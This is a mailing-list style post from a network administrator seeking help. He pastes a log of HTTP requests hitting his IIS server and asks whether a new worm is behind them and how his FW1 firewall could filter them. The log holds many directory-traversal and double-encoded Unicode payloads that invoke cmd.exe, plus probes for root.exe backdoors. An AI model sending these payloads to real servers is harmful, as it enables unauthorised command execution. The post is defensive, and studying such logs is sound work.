Since this evening I am experiencing massive attacks on HTTP (IIS
oriented I presume) from many different IP addresses.
They all look like:
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/root.exe?/c+dir HTTP/1.0
GET
/MSADC/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
Is anyone aware that this is some new kind of worm?
Now my FW1 question: can I create a HTTP resource (secure server) that
blocks all requests that e.g. have a .EXE in it ? Or would that slow
my FW1's down to much?
Any other suggestions for good products that can do HTTP content
inspection and that cooperate or can co-exist with fw1 ?
Thanks,
Patrick